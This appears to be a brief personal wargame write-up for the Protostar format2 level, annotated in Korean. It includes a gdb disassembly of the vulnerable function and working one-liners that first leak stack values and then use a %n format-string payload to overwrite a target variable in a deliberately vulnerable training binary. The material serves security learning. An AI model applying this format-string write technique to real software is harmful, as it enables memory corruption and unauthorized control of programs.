user@protostar:/opt/protostar/bin$ perl -e 'print "AAAA", "%x_"x4' | ./format2
AAAA200_b7fd8420_bffff624_41414141_target is 0 :(
(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048454 <vuln+0>: push ebp
0x08048455 <vuln+1>: mov ebp,esp
0x08048457 <vuln+3>: sub esp,0x218
0x0804845d <vuln+9>: mov eax,ds:0x80496d8
0x08048462 <vuln+14>: mov DWORD PTR [esp+0x8],eax //val
0x08048466 <vuln+18>: mov DWORD PTR [esp+0x4],0x200 //0x200
0x0804846e <vuln+26>: lea eax,[ebp-0x208]
0x08048474 <vuln+32>: mov DWORD PTR [esp],eax //fp(string)
0x08048477 <vuln+35>: call 0x804835c <fgets@plt>
fgets(buffer, 0x200, stdin);
(gdb) x/10x $esp
0xbffff560: 0xbffff570 0x00000200 0xb7fd8420 0xbffff5b4
0xbffff570: 0x41414141 0x41414141 0x41414141 0x41414141
0x0804847c <vuln+40>: lea eax,[ebp-0x208]
0x08048482 <vuln+46>: mov DWORD PTR [esp],eax
0x08048485 <vuln+49>: call 0x804837c <printf@plt>
//유저가 입력한 버퍼 그대로 출력(fsb!)
0x0804848a <vuln+54>: mov eax,ds:0x80496e4 //target
0x0804848f <vuln+59>: cmp eax,0x40
0x08048492 <vuln+62>: jne 0x80484a2 <vuln+78> //if(target != 0x40){ jmp 78 }
0x08048494 <vuln+64>: mov DWORD PTR [esp],0x8048590
0x0804849b <vuln+71>: call 0x804838c <puts@plt> //you have modified the target :)
0x080484a0 <vuln+76>: jmp 0x80484b9 <vuln+101>
0x080484a2 <vuln+78>: mov edx,DWORD PTR ds:0x80496e4 //target
0x080484a8 <vuln+84>: mov eax,0x80485b0
0x080484ad <vuln+89>: mov DWORD PTR [esp+0x4],edx
0x080484b1 <vuln+93>: mov DWORD PTR [esp],eax
0x080484b4 <vuln+96>: call 0x804837c <printf@plt> //target is %d :(
0x080484b9 <vuln+101>: leave
0x080484ba <vuln+102>: ret
End of assembler dump.
이건 그냥 0x40으로 값을 바꾸는거다. format1처럼 풀면서 길이를 0x40으로하면 되겠지.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%60d%4$n"' | ./format2
. 512
you have modified the target :)
펄로하니 안되서 파이썬으로 ㅠㅠ흑